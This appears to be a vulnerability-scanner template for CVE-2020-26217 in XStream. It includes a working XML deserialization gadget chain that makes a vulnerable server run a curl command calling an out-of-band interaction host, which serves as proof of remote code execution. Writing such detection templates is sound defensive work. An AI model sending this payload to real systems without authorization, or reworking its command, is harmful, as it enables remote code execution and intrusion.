91 lines
3.5 KiB
YAML
91 lines
3.5 KiB
YAML
id: CVE-2020-26217
|
|
|
|
info:
|
|
name: XStream < 1.4.14 - Remote Code Execution
|
|
author: pwnhxl
|
|
severity: high
|
|
description: |
|
|
XStream before version 1.4.14 is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker to run arbitrary shell commands only by manipulating the processed input stream. Only users who rely on blocklists are affected.
|
|
reference:
|
|
- https://x-stream.github.io/CVE-2020-26217.html
|
|
- https://github.com/x-stream/xstream/commit/0fec095d534126931c99fd38e9c6d41f5c685c1a
|
|
- https://github.com/x-stream/xstream/security/advisories/GHSA-mw36-7c6c-q4q2
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 8.8
|
|
cve-id: CVE-2020-26217
|
|
cwe-id: CWE-78
|
|
tags: cve,cve2020,xstream,deserialization,rce,oast
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/xml
|
|
|
|
<map>
|
|
<entry>
|
|
<jdk.nashorn.internal.objects.NativeString>
|
|
<flags>0</flags>
|
|
<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
|
|
<dataHandler>
|
|
<dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
|
|
<contentType>text/plain</contentType>
|
|
<is class='java.io.SequenceInputStream'>
|
|
<e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
|
|
<iterator class='javax.imageio.spi.FilterIterator'>
|
|
<iter class='java.util.ArrayList$Itr'>
|
|
<cursor>0</cursor>
|
|
<lastRet>-1</lastRet>
|
|
<expectedModCount>1</expectedModCount>
|
|
<outer-class>
|
|
<java.lang.ProcessBuilder>
|
|
<command>
|
|
<string>curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'</string>
|
|
</command>
|
|
</java.lang.ProcessBuilder>
|
|
</outer-class>
|
|
</iter>
|
|
<filter class='javax.imageio.ImageIO$ContainsFilter'>
|
|
<method>
|
|
<class>java.lang.ProcessBuilder</class>
|
|
<name>start</name>
|
|
<parameter-types/>
|
|
</method>
|
|
<name>start</name>
|
|
</filter>
|
|
<next/>
|
|
</iterator>
|
|
<type>KEYS</type>
|
|
</e>
|
|
<in class='java.io.ByteArrayInputStream'>
|
|
<buf></buf>
|
|
<pos>0</pos>
|
|
<mark>0</mark>
|
|
<count>0</count>
|
|
</in>
|
|
</is>
|
|
<consumed>false</consumed>
|
|
</dataSource>
|
|
<transferFlavors/>
|
|
</dataHandler>
|
|
<dataLen>0</dataLen>
|
|
</value>
|
|
</jdk.nashorn.internal.objects.NativeString>
|
|
<string>test</string>
|
|
</entry>
|
|
</map>
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
|
|
- type: word
|
|
part: interactsh_request
|
|
words:
|
|
- "User-Agent: {{rand_base(6)}}"
|